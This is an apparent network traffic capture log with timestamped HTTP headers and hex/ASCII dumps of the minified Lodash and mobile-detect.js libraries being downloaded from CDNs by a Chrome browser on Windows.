2024-02-09 10:09:49 UTC	577	IN	HTTP/1.1 200 OK Date: Fri, 09 Feb 2024 10:09:49 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close access-control-allow-origin: * cache-control: public, max-age=31536000 last-modified: Sat, 31 Dec 2016 22:32:41 GMT etag: W/"11c44-YN5uQ8SiwzJidasS1P/ZCyWCruk" via: 1.1 fly.io fly-request-id: 01HMW91J0DJDBVE6T11BTRF9H4-iad CF-Cache-Status: HIT Age: 1422359 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 852b51a9ea7d78cc-ATL
2024-02-09 10:09:49 UTC	792	IN	Data Raw: 37 38 33 34 0d 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 4c 6f 64 61 73 68 20 6c 6f 64 61 73 68 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 20 7c 20 55 6e 64 65 72 73 63 6f 72 65 2e 6a 73 20 31 2e 38 2e 33 20 75 6e 64 65 72 73 63 6f 72 65 6a 73 2e 6f 72 67 2f 4c 49 43 45 4e 53 45 0a 20 2a 2f 0a 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6e 2e 73 65 74 28 74 5b 30 5d 2c 74 5b 31 5d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 74 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6e 2e 61 64 64 28 74 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 28 6e 2c 74 2c 72 29 7b 73 77 69 74 63 68 28 72 2e 6c 65 6e 67 74 68 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 74 29 3b 63 61 73 65 20 Data Ascii: 7834/** * @license * Lodash lodash.com/license \| Underscore.js 1.8.3 underscorejs.org/LICENSE */;(function(){function n(n,t){return n.set(t[0],t[1]),n}function t(n,t){return n.add(t),n}function r(n,t,r){switch(r.length){case 0:return n.call(t);case
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 5b 5d 3b 2b 2b 72 3c 65 3b 29 7b 76 61 72 20 6f 3d 6e 5b 72 5d 3b 74 28 6f 2c 72 2c 6e 29 26 26 28 69 5b 75 2b 2b 5d 3d 6f 29 7d 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 63 28 6e 2c 74 29 7b 72 65 74 75 72 6e 21 28 6e 75 6c 6c 3d 3d 6e 7c 7c 21 6e 2e 6c 65 6e 67 74 68 29 26 26 2d 31 3c 64 28 6e 2c 74 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 6e 2c 74 2c 72 29 7b 66 6f 72 28 76 61 72 20 65 3d 2d 31 2c 75 3d 6e 75 6c 6c 3d 3d 6e 3f 30 3a 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 65 3c 75 3b 29 69 66 28 72 28 74 2c 6e 5b 65 5d 29 29 72 65 74 75 72 6e 20 74 72 75 65 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 2d 31 2c 65 3d 6e 75 6c 6c 3d 3d 6e 3f 30 3a 6e 2e 6c 65 6e 67 74 68 Data Ascii: [];++r<e;){var o=n[r];t(o,r,n)&&(i[u++]=o)}return i}function c(n,t){return!(null==n\|\|!n.length)&&-1<d(n,t,0)}function a(n,t,r){for(var e=-1,u=null==n?0:n.length;++e<u;)if(r(t,n[e]))return true;return false}function l(n,t){for(var r=-1,e=null==n?0:n.length
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 73 6f 72 74 28 74 29 3b 72 2d 2d 3b 29 6e 5b 72 5d 3d 6e 5b 72 5d 2e 63 3b 0a 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 3d 2d 31 2c 75 3d 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 65 3c 75 3b 29 7b 76 61 72 20 69 3d 74 28 6e 5b 65 5d 29 3b 69 21 3d 3d 46 26 26 28 72 3d 72 3d 3d 3d 46 3f 69 3a 72 2b 69 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 45 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 2d 31 2c 65 3d 41 72 72 61 79 28 6e 29 3b 2b 2b 72 3c 6e 3b 29 65 5b 72 5d 3d 74 28 72 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6c 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 74 2c 6e 5b 74 5d 5d 7d 29 7d 66 75 Data Ascii: sort(t);r--;)n[r]=n[r].c;return n}function k(n,t){for(var r,e=-1,u=n.length;++e<u;){var i=t(n[e]);i!==F&&(r=r===F?i:r+i)}return r}function E(n,t){for(var r=-1,e=Array(n);++r<n;)e[r]=t(r);return e}function O(n,t){return l(t,function(t){return[t,n[t]]})}fu
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 2a 3f 5c 29 7c 5c 62 5f 5f 74 5c 29 29 5c 2b 27 27 3b 2f 67 2c 47 3d 2f 26 28 3f 3a 61 6d 70 7c 6c 74 7c 67 74 7c 71 75 6f 74 7c 23 33 39 29 3b 2f 67 2c 48 3d 2f 5b 26 3c 3e 22 27 5d 2f 67 2c 4a 3d 52 65 67 45 78 70 28 47 2e 73 6f 75 72 63 65 29 2c 59 3d 52 65 67 45 78 70 28 48 2e 73 6f 75 72 63 65 29 2c 51 3d 2f 3c 25 2d 28 5b 5c 73 5c 53 5d 2b 3f 29 25 3e 2f 67 2c 58 3d 2f 3c 25 28 5b 5c 73 5c 53 5d 2b 3f 29 25 3e 2f 67 2c 6e 6e 3d 2f 3c 25 3d 28 5b 5c 73 5c 53 5d 2b 3f 29 25 3e 2f 67 2c 74 6e 3d 2f 5c 2e 7c 5c 5b 28 3f 3a 5b 5e 5b 5c 5d 5d 2a 7c 28 5b 22 27 5d 29 28 3f 3a 28 3f 21 5c 31 29 5b 5e 5c 5c 5d 7c 5c 5c 2e 29 2a 3f 5c 31 29 5c 5d 2f 2c 72 6e 3d 2f 5e 5c 77 2a 24 2f 2c 65 6e 3d 2f 5e 5c 2e 2f 2c 75 6e 3d 2f 5b 5e 2e 5b 5c 5d 5d 2b 7c 5c 5b 28 Data Ascii: ?\)\|\b__t\))\+'';/g,G=/&(?:amp\|lt\|gt\|quot\|#39);/g,H=/[&<>"']/g,J=RegExp(G.source),Y=RegExp(H.source),Q=/<%-([\s\S]+?)%>/g,X=/<%([\s\S]+?)%>/g,nn=/<%=([\s\S]+?)%>/g,tn=/\.\|\[(?:[^[\]]\|(["'])(?:(?!\1)[^\\]\|\\.)?\1)\]/,rn=/^\w$/,en=/^\./,un=/[^.[\]]+\|\[(
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 7b 32 7d 7c 5b 5c 5c 75 64 38 30 30 2d 5c 5c 75 64 62 66 66 5d 5b 5c 5c 75 64 63 30 30 2d 5c 5c 75 64 66 66 66 5d 7c 5b 5c 5c 75 64 38 30 30 2d 5c 5c 75 64 66 66 66 5d 29 22 2c 49 6e 3d 52 65 67 45 78 70 28 22 5b 27 5c 75 32 30 31 39 5d 22 2c 22 67 22 29 2c 52 6e 3d 52 65 67 45 78 70 28 22 5b 5c 5c 75 30 33 30 30 2d 5c 5c 75 30 33 36 66 5c 5c 75 66 65 32 30 2d 5c 5c 75 66 65 32 66 5c 5c 75 32 30 64 30 2d 5c 5c 75 32 30 66 66 5d 22 2c 22 67 22 29 2c 7a 6e 3d 52 65 67 45 78 70 28 22 5c 5c 75 64 38 33 63 5b 5c 5c 75 64 66 66 62 2d 5c 5c 75 64 66 66 66 5d 28 3f 3d 5c 5c 75 64 38 33 63 5b 5c 5c 75 64 66 66 62 2d 5c 5c 75 64 66 66 66 5d 29 7c 22 2b 53 6e 2b 45 6e 2c 22 67 22 29 2c 57 6e 3d 52 65 67 45 78 70 28 5b 22 5b 41 2d 5a 5c 5c 78 63 30 2d 5c 5c 78 64 36 Data Ascii: {2}\|[\\ud800-\\udbff][\\udc00-\\udfff]\|[\\ud800-\\udfff])",In=RegExp("['\u2019]","g"),Rn=RegExp("[\\u0300-\\u036f\\ufe20-\\ufe2f\\u20d0-\\u20ff]","g"),zn=RegExp("\\ud83c[\\udffb-\\udfff](?=\\ud83c[\\udffb-\\udfff])\|"+Sn+En,"g"),Wn=RegExp(["[A-Z\\xc0-\\xd6
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 62 66 5c 5c 75 32 30 30 30 2d 5c 5c 75 32 30 36 66 20 5c 5c 74 5c 5c 78 30 62 5c 5c 66 5c 5c 78 61 30 5c 5c 75 66 65 66 66 5c 5c 6e 5c 5c 72 5c 5c 75 32 30 32 38 5c 5c 75 32 30 32 39 5c 5c 75 31 36 38 30 5c 5c 75 31 38 30 65 5c 5c 75 32 30 30 30 5c 5c 75 32 30 30 31 5c 5c 75 32 30 30 32 5c 5c 75 32 30 30 33 5c 5c 75 32 30 30 34 5c 5c 75 32 30 30 35 5c 5c 75 32 30 30 36 5c 5c 75 32 30 30 37 5c 5c 75 32 30 30 38 5c 5c 75 32 30 30 39 5c 5c 75 32 30 30 61 5c 5c 75 32 30 32 66 5c 5c 75 32 30 35 66 5c 5c 75 33 30 30 30 5c 5c 64 2b 5c 5c 75 32 37 30 30 2d 5c 5c 75 32 37 62 66 61 2d 7a 5c 5c 78 64 66 2d 5c 5c 78 66 36 5c 5c 78 66 38 2d 5c 5c 78 66 66 41 2d 5a 5c 5c 78 63 30 2d 5c 5c 78 64 36 5c 5c 78 64 38 2d 5c 5c 78 64 65 5d 29 7c 24 29 7c 5b 41 2d 5a 5c 5c 78 Data Ascii: bf\\u2000-\\u206f \\t\\x0b\\f\\xa0\\ufeff\\n\\r\\u2028\\u2029\\u1680\\u180e\\u2000\\u2001\\u2002\\u2003\\u2004\\u2005\\u2006\\u2007\\u2008\\u2009\\u200a\\u202f\\u205f\\u3000\\d+\\u2700-\\u27bfa-z\\xdf-\\xf6\\xf8-\\xffA-Z\\xc0-\\xd6\\xd8-\\xde])\|$)\|[A-Z\\x
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 72 61 79 5d 22 5d 3d 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 49 6e 74 31 36 41 72 72 61 79 5d 22 5d 3d 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 49 6e 74 33 32 41 72 72 61 79 5d 22 5d 3d 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 38 41 72 72 61 79 5d 22 5d 3d 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 5d 22 5d 3d 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 31 36 41 72 72 61 79 5d 22 5d 3d 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 55 69 6e 74 33 32 41 72 72 61 79 5d 22 5d 3d 74 72 75 65 2c 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 41 72 67 75 6d 65 6e 74 73 5d 22 5d 3d 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 5d 3d 43 6e 5b 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d 22 5d 3d 43 6e 5b 22 5b Data Ascii: ray]"]=Cn["[object Int16Array]"]=Cn["[object Int32Array]"]=Cn["[object Uint8Array]"]=Cn["[object Uint8ClampedArray]"]=Cn["[object Uint16Array]"]=Cn["[object Uint32Array]"]=true,Cn["[object Arguments]"]=Cn["[object Array]"]=Cn["[object ArrayBuffer]"]=Cn["[
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 26 26 73 65 6c 66 2c 5a 6e 3d 4e 6e 7c 7c 50 6e 7c 7c 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 29 2c 71 6e 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3d 3d 22 6f 62 6a 65 63 74 22 26 26 65 78 70 6f 72 74 73 26 26 21 65 78 70 6f 72 74 73 2e 6e 6f 64 65 54 79 70 65 26 26 65 78 70 6f 72 74 73 2c 56 6e 3d 71 6e 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3d 3d 22 6f 62 6a 65 63 74 22 26 26 6d 6f 64 75 6c 65 26 26 21 6d 6f 64 75 6c 65 2e 6e 6f 64 65 54 79 70 65 26 26 6d 6f 64 75 6c 65 2c 4b 6e 3d 56 6e 26 26 56 6e 2e 65 78 70 6f 72 74 73 3d 3d 3d 71 6e 2c 47 6e 3d 4b 6e 26 26 4e 6e 2e 70 72 6f 63 65 73 73 3b 0a 6e 3a 7b 74 72 79 7b 4d 6e 3d 47 6e 26 26 47 6e 2e 62 69 6e 64 69 6e 67 26 26 47 6e 2e 62 69 6e 64 69 6e 67 28 22 75 Data Ascii: &&self,Zn=Nn\|\|Pn\|\|Function("return this")(),qn=typeof exports=="object"&&exports&&!exports.nodeType&&exports,Vn=qn&&typeof module=="object"&&module&&!module.nodeType&&module,Kn=Vn&&Vn.exports===qn,Gn=Kn&&Nn.process;n:{try{Mn=Gn&&Gn.binding&&Gn.binding("u
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 31 31 34 22 3a 22 45 22 2c 22 5c 75 30 31 31 36 22 3a 22 45 22 2c 22 5c 75 30 31 31 38 22 3a 22 45 22 2c 22 5c 75 30 31 31 61 22 3a 22 45 22 2c 22 5c 75 30 31 31 33 22 3a 22 65 22 2c 22 5c 75 30 31 31 35 22 3a 22 65 22 2c 22 5c 75 30 31 31 37 22 3a 22 65 22 2c 22 5c 75 30 31 31 39 22 3a 22 65 22 2c 22 5c 75 30 31 31 62 22 3a 22 65 22 2c 22 5c 75 30 31 31 63 22 3a 22 47 22 2c 22 5c 75 30 31 31 65 22 3a 22 47 22 2c 22 5c 75 30 31 32 30 22 3a 22 47 22 2c 22 5c 75 30 31 32 32 22 3a 22 47 22 2c 22 5c 75 30 31 31 64 22 3a 22 67 22 2c 22 5c 75 30 31 31 66 22 3a 22 67 22 2c 22 5c 75 30 31 32 31 22 3a 22 67 22 2c 22 5c 75 30 31 32 33 22 3a 22 67 22 2c 22 5c 75 30 31 32 34 22 3a 22 48 22 2c 22 5c 75 30 31 32 36 22 3a 22 48 22 2c 22 5c 75 30 31 32 35 22 3a 22 68 22 Data Ascii: 114":"E","\u0116":"E","\u0118":"E","\u011a":"E","\u0113":"e","\u0115":"e","\u0117":"e","\u0119":"e","\u011b":"e","\u011c":"G","\u011e":"G","\u0120":"G","\u0122":"G","\u011d":"g","\u011f":"g","\u0121":"g","\u0123":"g","\u0124":"H","\u0126":"H","\u0125":"h"
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 31 35 32 22 3a 22 4f 65 22 2c 22 5c 75 30 31 35 33 22 3a 22 6f 65 22 2c 0a 22 5c 75 30 31 34 39 22 3a 22 27 6e 22 2c 22 5c 75 30 31 37 66 22 3a 22 73 22 7d 29 2c 65 74 3d 77 28 7b 22 26 22 3a 22 26 61 6d 70 3b 22 2c 22 3c 22 3a 22 26 6c 74 3b 22 2c 22 3e 22 3a 22 26 67 74 3b 22 2c 27 22 27 3a 22 26 71 75 6f 74 3b 22 2c 22 27 22 3a 22 26 23 33 39 3b 22 7d 29 2c 75 74 3d 77 28 7b 22 26 61 6d 70 3b 22 3a 22 26 22 2c 22 26 6c 74 3b 22 3a 22 3c 22 2c 22 26 67 74 3b 22 3a 22 3e 22 2c 22 26 71 75 6f 74 3b 22 3a 27 22 27 2c 22 26 23 33 39 3b 22 3a 22 27 22 7d 29 2c 69 74 3d 66 75 6e 63 74 69 6f 6e 20 77 28 45 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 4f 6e 28 6e 29 7b 69 66 28 78 75 28 6e 29 26 26 21 61 66 28 6e 29 26 26 21 28 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 4d Data Ascii: 152":"Oe","\u0153":"oe","\u0149":"'n","\u017f":"s"}),et=w({"&":"&","<":"<",">":">",'"':""","'":"'"}),ut=w({"&":"&","<":"<",">":">",""":'"',"'":"'"}),it=function w(En){function On(n){if(xu(n)&&!af(n)&&!(n instanceof M

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:49 UTC	588	OUT	GET /ajax/libs/mobile-detect/1.3.6/mobile-detect.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:49 UTC	967	IN	HTTP/1.1 200 OK Date: Fri, 09 Feb 2024 10:09:49 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03f25-9341" Last-Modified: Mon, 04 May 2020 16:13:25 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 1913036 Expires: Wed, 29 Jan 2025 10:09:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g7KAwj3hLGwXuMVjniCR5fI5fdSJwQCKprFrFBc%2BteIJS4xW%2FYV5oGhCO06sIJfqgEkYDeE%2Fiz9DHWt41jm0mlgXvu%2FST3D%2BTjL2lc%2B6cjum7bvIMl%2B45MbcxByZ2BDIb4ebGWoq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 852b51ae1bd207e2-ATL alt-svc: h3=":443"; ma=86400
2024-02-09 10:09:49 UTC	402	IN	Data Raw: 33 39 61 64 0d 0a 2f 2a 21 40 6c 69 63 65 6e 73 65 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2c 20 48 65 69 6e 72 69 63 68 20 47 6f 65 62 6c 2c 20 4c 69 63 65 6e 73 65 3a 20 4d 49 54 2c 20 73 65 65 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 68 67 6f 65 62 6c 2f 6d 6f 62 69 6c 65 2d 64 65 74 65 63 74 2e 6a 73 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 26 26 6e 75 6c 6c 21 3d 62 26 26 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 65 3d Data Ascii: 39ad/!@license Copyright 2013, Heinrich Goebl, License: MIT, see https://github.com/hgoebl/mobile-detect.js/!function(a,b){a(function(){"use strict";function a(a,b){return null!=a&&null!=b&&a.toLowerCase()===b.toLowerCase()}function c(a,b){var c,d,e=
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 26 28 61 5b 62 5d 3d 6e 65 77 20 52 65 67 45 78 70 28 61 5b 62 5d 2c 22 69 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 2c 62 29 7b 74 68 69 73 2e 75 61 3d 61 7c 7c 22 22 2c 74 68 69 73 2e 5f 63 61 63 68 65 3d 7b 7d 2c 74 68 69 73 2e 6d 61 78 50 68 6f 6e 65 57 69 64 74 68 3d 62 7c 7c 36 30 30 7d 76 61 72 20 66 3d 7b 7d 3b 66 2e 6d 6f 62 69 6c 65 44 65 74 65 63 74 52 75 6c 65 73 3d 7b 70 68 6f 6e 65 73 3a 7b 69 50 68 6f 6e 65 3a 22 5c 5c 62 69 50 68 6f 6e 65 5c 5c 62 7c 5c 5c 62 69 50 6f 64 5c 5c 62 22 2c 42 6c 61 63 6b 42 65 72 72 79 3a 22 42 6c 61 63 6b 42 65 72 72 79 7c 5c 5c 62 42 42 31 30 5c 5c 62 7c 72 69 6d 5b 30 2d 39 5d 2b 22 2c 48 54 43 3a 22 48 54 43 7c 48 54 43 2e 2a 28 53 65 6e 73 61 74 69 6f 6e 7c 45 76 6f 7c 56 69 73 69 6f 6e 7c 45 78 70 Data Ascii: &(a[b]=new RegExp(a[b],"i"))}function e(a,b){this.ua=a\|\|"",this._cache={},this.maxPhoneWidth=b\|\|600}var f={};f.mobileDetectRules={phones:{iPhone:"\\biPhone\\b\|\\biPod\\b",BlackBerry:"BlackBerry\|\\bBB10\\b\|rim[0-9]+",HTC:"HTC\|HTC.*(Sensation\|Evo\|Vision\|Exp
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 30 32 31 7c 5c 5c 62 4d 6f 74 6f 20 45 5c 5c 62 22 2c 53 61 6d 73 75 6e 67 3a 22 5c 5c 62 53 61 6d 73 75 6e 67 5c 5c 62 7c 53 4d 2d 47 39 32 35 30 7c 47 54 2d 31 39 33 30 30 7c 53 47 48 2d 49 33 33 37 7c 42 47 54 2d 53 35 32 33 30 7c 47 54 2d 42 32 31 30 30 7c 47 54 2d 42 32 37 30 30 7c 47 54 2d 42 32 37 31 30 7c 47 54 2d 42 33 32 31 30 7c 47 54 2d 42 33 33 31 30 7c 47 54 2d 42 33 34 31 30 7c 47 54 2d 42 33 37 33 30 7c 47 54 2d 42 33 37 34 30 7c 47 54 2d 42 35 35 31 30 7c 47 54 2d 42 35 35 31 32 7c 47 54 2d 42 35 37 32 32 7c 47 54 2d 42 36 35 32 30 7c 47 54 2d 42 37 33 30 30 7c 47 54 2d 42 37 33 32 30 7c 47 54 2d 42 37 33 33 30 7c 47 54 2d 42 37 33 35 30 7c 47 54 2d 42 37 35 31 30 7c 47 54 2d 42 37 37 32 32 7c 47 54 2d 42 37 38 30 30 7c 47 54 2d 43 33 30 Data Ascii: 021\|\\bMoto E\\b",Samsung:"\\bSamsung\\b\|SM-G9250\|GT-19300\|SGH-I337\|BGT-S5230\|GT-B2100\|GT-B2700\|GT-B2710\|GT-B3210\|GT-B3310\|GT-B3410\|GT-B3730\|GT-B3740\|GT-B5510\|GT-B5512\|GT-B5722\|GT-B6520\|GT-B7300\|GT-B7320\|GT-B7330\|GT-B7350\|GT-B7510\|GT-B7722\|GT-B7800\|GT-C30
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 54 2d 53 35 32 36 30 7c 47 54 2d 53 35 32 36 33 7c 47 54 2d 53 35 32 37 30 7c 47 54 2d 53 35 33 30 30 7c 47 54 2d 53 35 33 33 30 7c 47 54 2d 53 35 33 35 30 7c 47 54 2d 53 35 33 36 30 7c 47 54 2d 53 35 33 36 33 7c 47 54 2d 53 35 33 36 39 7c 47 54 2d 53 35 33 38 30 7c 47 54 2d 53 35 33 38 30 44 7c 47 54 2d 53 35 35 36 30 7c 47 54 2d 53 35 35 37 30 7c 47 54 2d 53 35 36 30 30 7c 47 54 2d 53 35 36 30 33 7c 47 54 2d 53 35 36 31 30 7c 47 54 2d 53 35 36 32 30 7c 47 54 2d 53 35 36 36 30 7c 47 54 2d 53 35 36 37 30 7c 47 54 2d 53 35 36 39 30 7c 47 54 2d 53 35 37 35 30 7c 47 54 2d 53 35 37 38 30 7c 47 54 2d 53 35 38 33 30 7c 47 54 2d 53 35 38 33 39 7c 47 54 2d 53 36 31 30 32 7c 47 54 2d 53 36 35 30 30 7c 47 54 2d 53 37 30 37 30 7c 47 54 2d 53 37 32 30 30 7c 47 54 2d Data Ascii: T-S5260\|GT-S5263\|GT-S5270\|GT-S5300\|GT-S5330\|GT-S5350\|GT-S5360\|GT-S5363\|GT-S5369\|GT-S5380\|GT-S5380D\|GT-S5560\|GT-S5570\|GT-S5600\|GT-S5603\|GT-S5610\|GT-S5620\|GT-S5660\|GT-S5670\|GT-S5690\|GT-S5750\|GT-S5780\|GT-S5830\|GT-S5839\|GT-S6102\|GT-S6500\|GT-S7070\|GT-S7200\|GT-
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 47 48 2d 43 31 32 30 7c 53 47 48 2d 43 31 33 30 7c 53 47 48 2d 43 31 34 30 7c 53 47 48 2d 43 31 36 30 7c 53 47 48 2d 43 31 37 30 7c 53 47 48 2d 43 31 38 30 7c 53 47 48 2d 43 32 30 30 7c 53 47 48 2d 43 32 30 37 7c 53 47 48 2d 43 32 31 30 7c 53 47 48 2d 43 32 32 35 7c 53 47 48 2d 43 32 33 30 7c 53 47 48 2d 43 34 31 37 7c 53 47 48 2d 43 34 35 30 7c 53 47 48 2d 44 33 30 37 7c 53 47 48 2d 44 33 34 37 7c 53 47 48 2d 44 33 35 37 7c 53 47 48 2d 44 34 30 37 7c 53 47 48 2d 44 34 31 35 7c 53 47 48 2d 44 37 38 30 7c 53 47 48 2d 44 38 30 37 7c 53 47 48 2d 44 39 38 30 7c 53 47 48 2d 45 31 30 35 7c 53 47 48 2d 45 32 30 30 7c 53 47 48 2d 45 33 31 35 7c 53 47 48 2d 45 33 31 36 7c 53 47 48 2d 45 33 31 37 7c 53 47 48 2d 45 33 33 35 7c 53 47 48 2d 45 35 39 30 7c 53 47 48 2d Data Ascii: GH-C120\|SGH-C130\|SGH-C140\|SGH-C160\|SGH-C170\|SGH-C180\|SGH-C200\|SGH-C207\|SGH-C210\|SGH-C225\|SGH-C230\|SGH-C417\|SGH-C450\|SGH-D307\|SGH-D347\|SGH-D357\|SGH-D407\|SGH-D415\|SGH-D780\|SGH-D807\|SGH-D980\|SGH-E105\|SGH-E200\|SGH-E315\|SGH-E316\|SGH-E317\|SGH-E335\|SGH-E590\|SGH-
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 47 48 2d 58 34 39 35 7c 53 47 48 2d 58 34 39 37 7c 53 47 48 2d 58 35 30 37 7c 53 47 48 2d 58 36 30 30 7c 53 47 48 2d 58 36 31 30 7c 53 47 48 2d 58 36 32 30 7c 53 47 48 2d 58 36 33 30 7c 53 47 48 2d 58 37 30 30 7c 53 47 48 2d 58 38 32 30 7c 53 47 48 2d 58 38 39 30 7c 53 47 48 2d 5a 31 33 30 7c 53 47 48 2d 5a 31 35 30 7c 53 47 48 2d 5a 31 37 30 7c 53 47 48 2d 5a 58 31 30 7c 53 47 48 2d 5a 58 32 30 7c 53 48 57 2d 4d 31 31 30 7c 53 50 48 2d 41 31 32 30 7c 53 50 48 2d 41 34 30 30 7c 53 50 48 2d 41 34 32 30 7c 53 50 48 2d 41 34 36 30 7c 53 50 48 2d 41 35 30 30 7c 53 50 48 2d 41 35 36 30 7c 53 50 48 2d 41 36 30 30 7c 53 50 48 2d 41 36 32 30 7c 53 50 48 2d 41 36 36 30 7c 53 50 48 2d 41 37 30 30 7c 53 50 48 2d 41 37 34 30 7c 53 50 48 2d 41 37 36 30 7c 53 50 48 2d Data Ascii: GH-X495\|SGH-X497\|SGH-X507\|SGH-X600\|SGH-X610\|SGH-X620\|SGH-X630\|SGH-X700\|SGH-X820\|SGH-X890\|SGH-Z130\|SGH-Z150\|SGH-Z170\|SGH-ZX10\|SGH-ZX20\|SHW-M110\|SPH-A120\|SPH-A400\|SPH-A420\|SPH-A460\|SPH-A500\|SPH-A560\|SPH-A600\|SPH-A620\|SPH-A660\|SPH-A700\|SPH-A740\|SPH-A760\|SPH-
2024-02-09 10:09:49 UTC	1369	IN	Data Raw: 37 34 30 7c 4c 53 38 34 30 7c 4c 53 39 37 30 7c 4c 55 36 32 30 30 7c 4d 53 36 39 30 7c 4d 53 36 39 35 7c 4d 53 37 37 30 7c 4d 53 38 34 30 7c 4d 53 38 37 30 7c 4d 53 39 31 30 7c 50 35 30 30 7c 50 37 30 30 7c 50 37 30 35 7c 56 4d 36 39 36 7c 41 53 36 38 30 7c 41 53 36 39 35 7c 41 58 38 34 30 7c 43 37 32 39 7c 45 39 37 30 7c 47 53 35 30 35 7c 32 37 32 7c 43 33 39 35 7c 45 37 33 39 42 4b 7c 45 39 36 30 7c 4c 35 35 43 7c 4c 37 35 43 7c 4c 53 36 39 36 7c 4c 53 38 36 30 7c 50 37 36 39 42 4b 7c 50 33 35 30 7c 50 35 30 30 7c 50 35 30 39 7c 50 38 37 30 7c 55 4e 32 37 32 7c 55 53 37 33 30 7c 56 53 38 34 30 7c 56 53 39 35 30 7c 4c 4e 32 37 32 7c 4c 4e 35 31 30 7c 4c 53 36 37 30 7c 4c 53 38 35 35 7c 4c 57 36 39 30 7c 4d 4e 32 37 30 7c 4d 4e 35 31 30 7c 50 35 30 39 7c Data Ascii: 